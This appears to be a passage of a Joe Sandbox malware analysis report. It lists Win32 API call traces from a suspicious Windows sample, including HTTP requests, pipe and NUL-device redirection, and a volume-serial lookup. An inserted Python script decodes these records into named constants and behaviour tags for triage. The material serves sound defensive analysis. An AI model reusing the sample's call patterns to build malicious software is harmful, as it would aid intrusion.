                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                • API String ID: 4237274167-1221869570
                                                                                                                • Opcode ID: f526cf3e387b3df50bb74ffae9c5bf51ebca9a533d419456a5f3e68a38ecf5cc
                                                                                                                • Instruction ID: 88cb7cf491dee361d1a62e6a21e5912e79ce5781a7fcd3b9bfc20fb99afcece8
                                                                                                                • Opcode Fuzzy Hash: f526cf3e387b3df50bb74ffae9c5bf51ebca9a533d419456a5f3e68a38ecf5cc
                                                                                                                • Instruction Fuzzy Hash: 51918C746283029FCB14DF24C48496AB7F8EF89701F14486DF88A9B392DB31E959CF52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00203BCF: _wcscpy.LIBCMT ref: 00203BF2
                                                                                                                • _memset.LIBCMT ref: 00245E56
                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 00245E85
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00245F31
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00245F5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 4152858687-4108050209
                                                                                                                • Opcode ID: 1b8c5c415e020900afaf90769dc887ffce84e454402a1540d26c4ebd4fe75620
                                                                                                                • Instruction ID: b4d1468d7ec8e58863c0680dd2d70dcc23744fe54693cbf7ed64a16ff8f8f643
                                                                                                                • Opcode Fuzzy Hash: 1b8c5c415e020900afaf90769dc887ffce84e454402a1540d26c4ebd4fe75620
                                                                                                                • Instruction Fuzzy Hash: 7D51F171634B22ABD3189F28C845A6BB7E4AF46710F090629F8D1D31D3DB70CD398B92
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002410B8
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002410EE
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002410FF
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00241181
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                • Opcode ID: de0778c4f47cf0ce7107c85fc018cd8a3a01ac2ed8dc3ba5d2ce59979750ecc7
                                                                                                                • Instruction ID: f06ab4d1135997bc0727655c0f9db2bbe0880300c2d217e872d794ea35375b18
                                                                                                                • Opcode Fuzzy Hash: de0778c4f47cf0ce7107c85fc018cd8a3a01ac2ed8dc3ba5d2ce59979750ecc7
                                                                                                                • Instruction Fuzzy Hash: 3F416B71620205EFDB09CF54C884BAA7BA9EF44350F1480A9EE0DDF245D7B1DDA4CBA0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00245A93
                                                                                                                • GetMenuItemInfoW.USER32 ref: 00245AAF
                                                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00245AF5
                                                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002C18F0,00000000), ref: 00245B3E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1173514356-4108050209
                                                                                                                • Opcode ID: 9c0460543df17cdb02d389f697856e3d0c05898170f4e14d43e5741a575aef6e
                                                                                                                • Instruction ID: 208f4dde81e62391e30bfe31f5fa25390c25f9f8bff8e42cb9211379b0103ad7
                                                                                                                • Opcode Fuzzy Hash: 9c0460543df17cdb02d389f697856e3d0c05898170f4e14d43e5741a575aef6e
                                                                                                                • Instruction Fuzzy Hash: 3641C371214712AFDB18DF24D884F1AB7E8EF88718F04461DF8A59B2D2D770E824CB62
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00260478
                                                                                                                  • Part of subcall function 00207F40: _memmove.LIBCMT ref: 00207F8F
                                                                                                                  • Part of subcall function 0020A2FB: _memmove.LIBCMT ref: 0020A33D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$BuffCharLower
                                                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                                                • API String ID: 2411302734-567219261
                                                                                                                • Opcode ID: cf194c3cfb1d62ecc63dc2782b53fdebeaaf725c84c01d71fac6df403ca6e7f9
                                                                                                                • Instruction ID: 3beed0c0adf70adbc38996539c34ac492a31755791f04d5ea0560448177e92bf
                                                                                                                • Opcode Fuzzy Hash: cf194c3cfb1d62ecc63dc2782b53fdebeaaf725c84c01d71fac6df403ca6e7f9
                                                                                                                • Instruction Fuzzy Hash: D331D23452061AAFCF10EF58C980AEFB3B4FF15350B508A29E822972D6CB71E965CF50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0023C684
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0023C697
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 0023C6C7
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 458670788-1403004172
                                                                                                                • Opcode ID: e7909468edbf40081b45c48ba5b61b203e06960e9a85c8468b17ba9c4a3d506d
                                                                                                                • Instruction ID: a87dbc6ce0ede0d330bba33281de26fa2f5cf41c77f27d91e5123135f2652ab4
                                                                                                                • Opcode Fuzzy Hash: e7909468edbf40081b45c48ba5b61b203e06960e9a85c8468b17ba9c4a3d506d
                                                                                                                • Instruction Fuzzy Hash: C421E1B5920208AADB04AB64D886DFEB76C9B42350F204519F421A31E2DB74592A9F10
                                                                                                                APIs
                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00254A60
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00254A86
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00254AB6
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00254AFD
                                                                                                                  • Part of subcall function 002556A9: GetLastError.KERNEL32(?,?,00254A2B,00000000,00000000,00000001), ref: 002556BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1951874230-3916222277
                                                                                                                • Opcode ID: f8a8d1eda31cd4c967c6f29ba4b50bda39ed8a49dcdafaa02f6d556c27913573
                                                                                                                • Instruction ID: 3aca42c7f25ec249e16429605f2976f715c31025ca70670128062b73224c0cde
                                                                                                                • Opcode Fuzzy Hash: f8a8d1eda31cd4c967c6f29ba4b50bda39ed8a49dcdafaa02f6d556c27913573
                                                                                                                • Instruction Fuzzy Hash: 9221FFBA550208BFEB11EF64DC94EBFF7ECEB88749F00011AF90592140EA709D599B78
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0027454E
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • _memset.LIBCMT ref: 00203965
                                                                                                                • _wcscpy.LIBCMT ref: 002039B5
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002039C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                • String ID: Line:
                                                                                                                • API String ID: 3942752672-1585850449
                                                                                                                • Opcode ID: d53df8f73831077f539e14a22957032f2342247860bba9e17fd190c327da6b42
                                                                                                                • Instruction ID: 3aea058a2aad3ce93d02d0b5b4bde6abc14233fae054877ab54a2b985eaec362
                                                                                                                • Opcode Fuzzy Hash: d53df8f73831077f539e14a22957032f2342247860bba9e17fd190c327da6b42
                                                                                                                • Instruction Fuzzy Hash: D031AF71428345ABD721EB60EC46FDB77ECAF55310F40451AF589821E2DBB0AA78CF92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0021C657
                                                                                                                  • Part of subcall function 0021C619: GetStockObject.GDI32(00000011), ref: 0021C66B
                                                                                                                  • Part of subcall function 0021C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021C675
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00268F69
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00268F70
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00268F85
                                                                                                                • DestroyWindow.USER32(?), ref: 00268F8D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 4146253029-1011021900
                                                                                                                • Opcode ID: 504af2c9e63e47833bd2616015187fc9b1b3c0de72fd48a1cac219549d838c4e
                                                                                                                • Instruction ID: 71090b287cdf212b9d5861291a4e3f23c7bcfff1a888ef743e90d75e641e00a0
                                                                                                                • Opcode Fuzzy Hash: 504af2c9e63e47833bd2616015187fc9b1b3c0de72fd48a1cac219549d838c4e
                                                                                                                • Instruction Fuzzy Hash: 4721CD71220206AFEF105E64EC84EBB37AEEB59324F904728FA5493591CB71DCA09B60
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00249E85
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00249EB6
                                                                                                                • GetStdHandle.KERNEL32(0000000C), ref: 00249EC8
                                                                                                                • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00249F02
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: 10a1945f8946f3fed86aa20d7f1442bc2b2c4db98dc0bccec98bc3464b798071
                                                                                                                • Instruction ID: 3152554d424755236ba55ee1a15d13196646a80ef40339518877daadb6716c07
                                                                                                                • Opcode Fuzzy Hash: 10a1945f8946f3fed86aa20d7f1442bc2b2c4db98dc0bccec98bc3464b798071
                                                                                                                • Instruction Fuzzy Hash: AC215174A10306AFDB24DF29DC45A9B7BB8AF85720F204A1AFCA5D72D0D77099A4CB50
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00249F50
                                                                                                                • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00249F80
                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00249F91
                                                                                                                • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00249FCB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHandle$FilePipe
                                                                                                                • String ID: nul
                                                                                                                • API String ID: 4209266947-2873401336
                                                                                                                • Opcode ID: 5bd7a8658d4a0b1df0e4025dcf0ee7ec26349ab60812d0e0d824909cb2af4a54
                                                                                                                • Instruction ID: 5736522ce4fb3081f9de3ac042aa591500f01e50780ba266baf1b23192e480c5
                                                                                                                • Opcode Fuzzy Hash: 5bd7a8658d4a0b1df0e4025dcf0ee7ec26349ab60812d0e0d824909cb2af4a54
                                                                                                                • Instruction Fuzzy Hash: E421A1756103069BDB249F69DC04A9B77B8AF85720F200A19FCA1D72D0D7709CA9CB50
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0024E392
                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0024E3E6
                                                                                                                • __swprintf.LIBCMT ref: 0024E3FF
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000,0029DBF0), ref: 0024E43D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                • String ID: %lu
                                                                                                                • API String ID: 3164766367-685833217
                                                                                                                • Opcode ID: e4b22db65c8b847061860cbdd9096eef18ac5078e2a277c31563770ffbe590c2
                                                                                                                • Instruction ID: 99826edbcffceeb63656ce12a76dfcc95149a62443c1bd04853f35fae5cd62d0
                                                                                                                • Opcode Fuzzy Hash: e4b22db65c8b847061860cbdd9096eef18ac5078e2a277c31563770ffbe590c2
                                                                                                                • Instruction Fuzzy Hash: E6217F79A50208AFCB10EFA4DC89DEEB7B8EF49714B104069F509E7292D771DA15CF60
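The API lists above are easier to triage once the raw hexadecimal arguments are mapped back to their Win32 names: the WinINet routine at 00254A60 queries info class 5 (HTTP_QUERY_CONTENT_LENGTH), the two CreatePipe/CreateFileW("nul") routines at 00249E85 and 00249F50 open the NUL device with GENERIC_WRITE/FILE_SHARE_WRITE and GENERIC_READ/FILE_SHARE_READ respectively and OPEN_EXISTING, and the routine at 0024E392 formats the result of GetVolumeInformationW with "%lu" under SEM_FAILCRITICALERRORS. The Python script below is an added example written for this page, not Joe Sandbox's or the sample's own code: it parses API lines in the report's rendered format, decodes those constants, and tags each function with the behaviour its call pattern implies. The constant tables, the tag names, and the function names are the editor's choice; the embedded input is excerpted from the three records above. Arguments the report prints truncated, such as GetStdHandle(000000F6), are left as raw hex rather than guessed.

```python
"""Decode Joe Sandbox function-level "APIs" records into named Win32 constants and behaviour
tags. Added example for this page, not Joe Sandbox's or the sample's code; tables and tag names are the editor's."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# "[Part of subcall function ADDR: ]Name.MODULE[(args)], ref: ADDR", bullet already stripped
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

FLAG_ARGS = {  # (API, argument index) -> OR-able bit names
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", 2): {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"},
    ("CreateFileW", 5): {0x80: "FILE_ATTRIBUTE_NORMAL"},
    ("SetErrorMode", 0): {1: "SEM_FAILCRITICALERRORS", 2: "SEM_NOGPFAULTERRORBOX",
                          0x8000: "SEM_NOOPENFILEERRORBOX"},
}
ENUM_ARGS = {  # (API, argument index) -> exact values
    ("CreateFileW", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("HttpQueryInfoW", 1): {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"},
    # Full 32-bit IDs only: the truncated 0000000C / 000000F6 this report prints stay raw hex.
    ("GetStdHandle", 0): {0xFFFFFFF6: "STD_INPUT_HANDLE", 0xFFFFFFF5: "STD_OUTPUT_HANDLE",
                          0xFFFFFFF4: "STD_ERROR_HANDLE"},
}

Call = namedtuple("Call", "name module args ref caller")  # caller is set on subcall lines only
@dataclass
class Record:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # from the record's "String ID" line

def parse_records(text):
    records, current = [], None  # one Record per "APIs" block; other headers are skipped
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_LINE.match(line)
        if line == "APIs":
            current = Record()
            records.append(current)
        elif current is None:
            continue
        elif m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            caller = int(m.group("caller"), 16) if m.group("caller") else None
            current.calls.append(Call(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), caller))
        elif line.startswith("String ID:"):
            current.strings = [s for s in line[10:].strip().split("$") if s]
    return records

def decode_arg(api, index, raw):
    """Symbolic name for one argument where a table covers it, else the raw value."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
        return raw  # "?", "nul", or anything else the sandbox left unresolved
    value, key = int(raw, 16), (api, index)
    if value in ENUM_ARGS.get(key, {}):
        return ENUM_ARGS[key][value]
    if key not in FLAG_ARGS:
        return f"0x{value:X}"
    hit = {bit: name for bit, name in FLAG_ARGS[key].items() if value & bit == bit}
    rest = value & ~sum(hit)  # bits no table entry explains are kept as hex
    return "|".join(list(hit.values()) + ([f"0x{rest:X}"] if rest else [])) or "0x0"

def annotate(rec):
    """Each call rendered with decoded arguments and its address in the dump."""
    out = []
    for c in rec.calls:
        args = ", ".join(decode_arg(c.name, i, a) for i, a in enumerate(c.args))
        via = f"[via {c.caller:08X}] " if c.caller is not None else ""
        out.append(f"{via}{c.name}({args}) @ {c.ref:08X}")
    return out

def classify(rec):
    """Behaviour tags from the function's direct calls plus its String ID."""
    direct = {c.name for c in rec.calls if c.caller is None}
    tags = []
    if "InternetOpenUrlW" in direct and direct & {"HttpSendRequestW", "HttpQueryInfoW", "InternetReadFile"}:
        tags.append("wininet-http-request")
    if "CreatePipe" in direct and any(c.name == "CreateFileW" and c.args[:1] == ["nul"] for c in rec.calls):
        tags.append("child-stdio-to-nul")
    if "GetVolumeInformationW" in direct and "%lu" in rec.strings:
        tags.append("volume-serial-as-id")
    return tags

# Constructed input: three records excerpted from this report (process 0000000A, base 00200000).
SAMPLE_REPORT = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00254A60
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00254AB6
  • Part of subcall function 002556A9: GetLastError.KERNEL32(?,?,00254A2B,00000000,00000000,00000001), ref: 002556BE
APIs
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00249EB6
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00249F02
• String ID: nul
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0024E392
• GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0024E3E6
• __swprintf.LIBCMT ref: 0024E3FF
• String ID: %lu
"""
```

Calling `annotate()` and `classify()` over `parse_records(SAMPLE_REPORT)` renders the second record's CreateFileW as `CreateFileW(nul, GENERIC_WRITE, FILE_SHARE_WRITE, 0xC, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0x0) @ 00249F02` and tags the three records `wininet-http-request`, `child-stdio-to-nul` and `volume-serial-as-id`. The tags deliberately use only direct calls, so a `Part of subcall function` line cannot make a caller look like it performs the network or file operation itself; the "String ID" line is used only where the API sequence alone is ambiguous (a `%lu` format after GetVolumeInformationW points at the volume serial being turned into a decimal identifier, whereas the same API could also be reading the filesystem name). Feeding the script a whole exported report rather than the excerpt is a matter of pasting the text in; the unrecognised header lines (Memory Dump Source, Similarity, the fuzzy hashes) are ignored.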
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                  • Part of subcall function 0023D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0023D640
                                                                                                                  • Part of subcall function 0023D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0023D653
